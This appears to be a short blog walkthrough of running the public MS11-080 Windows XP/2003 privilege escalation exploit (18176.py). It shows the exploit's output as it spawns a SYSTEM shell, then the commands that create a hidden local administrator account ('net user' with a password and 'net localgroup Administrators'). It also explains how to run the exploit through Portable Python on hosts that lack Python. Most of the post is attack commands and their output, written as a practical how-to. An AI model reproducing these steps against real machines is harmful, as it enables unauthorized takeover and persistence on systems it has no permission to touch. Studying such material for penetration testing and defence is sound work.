So you’ve got access to a box, but only as a local user, and like most people you want SYSTEM. Step in 18176.py. As this code was written in Python, you’ll need a local copy of Python on the box in order to priv up.
C:\Documents and Settings\user\Desktop>18176.py
Usage: 18176.py -O TARGET_OS

Options:
  -h, --help            show this help message and exit
  -O TARGET_OS, --target-os=TARGET_OS
                        Target OS. Accepted values: XP, 2K3

C:\Documents and Settings\user\Desktop>
My first attempt was with Python version 3.2.2, and for some reason the code kept failing.
C:\Documents and Settings\user\Desktop>18176.py
  File "C:\Documents and Settings\Administrator\Desktop\18176.py", line 56
    print "[+] Retrieving %s info..." % drvname
                                      ^
SyntaxError: invalid syntax

C:\Documents and Settings\user\Desktop>
Python version 2.7 seemed to work just fine 🙂
C:\Documents and Settings\user\Desktop>net user newadmin /add
System error 5 has occurred.

Access is denied.

C:\Documents and Settings\user\Desktop>18176.py -O XP
[>] MS11-080 Privilege Escalation Exploit
[>] Matteo Memelli - ryujin@offsec.com
[>] Release Date 28/11/2011
[+] Retrieving Kernel info...
[+] Kernel version: ntkrnlpa.exe
[+] Kernel base address: 0x804d7000L
[+] HalDispatchTable address: 0x8054d038L
[+] Retrieving hal.dll info...
[+] hal.dll base address: 0x806e5000L
[+] HaliQuerySystemInformation address: 0x806fbbbaL
[+] HalpSetSystemInformation address: 0x806fe436L
[*] Triggering AFDJoinLeaf pointer overwrite...
[*] Spawning a SYSTEM shell...
C:\WINDOWS\system32>
And now for the quick new user 🙂
C:\WINDOWS\system32>net user newadmin Secret01 /add
The command completed successfully.

C:\WINDOWS\system32>net localgroup Administrators newadmin /add
The command completed successfully.

C:\WINDOWS\system32>net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            ASPNET                   Guest
HelpAssistant            newadmin                 SUPPORT_388945a0
user
The command completed with one or more errors.

C:\WINDOWS\system32>
I got thinking: yeah, I could attempt to rewrite this exploit in another language, but that’s way past my skill level and available time. So what about a portable version of Python? Step in PortablePython! The download is 45MB, and once extracted it’s 222MB. Then it’s just a simple case of pointing the python.exe at the code 🙂
C:\Documents and Settings\user\Desktop>PortablePy\App\python.exe 18176.py -O XP
[>] MS11-080 Privilege Escalation Exploit
[>] Matteo Memelli - ryujin@offsec.com
[>] Release Date 28/11/2011
[+] Retrieving Kernel info...
[+] Kernel version: ntkrnlpa.exe
[+] Kernel base address: 0x804d7000L
[+] HalDispatchTable address: 0x8054d038L
[+] Retrieving hal.dll info...
[+] hal.dll base address: 0x806e5000L
[+] HaliQuerySystemInformation address: 0x806fbbbaL
[+] HalpSetSystemInformation address: 0x806fe436L
[*] Triggering AFDJoinLeaf pointer overwrite...
[*] Spawning a SYSTEM shell...
C:\WINDOWS\system32>net user newuser Secret01 /add
The command completed successfully.

C:\WINDOWS\system32>
It would be nice to see how much I could strip out of the portable version in order to decrease its size, but that’s just something else for a rainy day.
How long before this is written in PowerShell or added to Meterpreter’s getsystem code?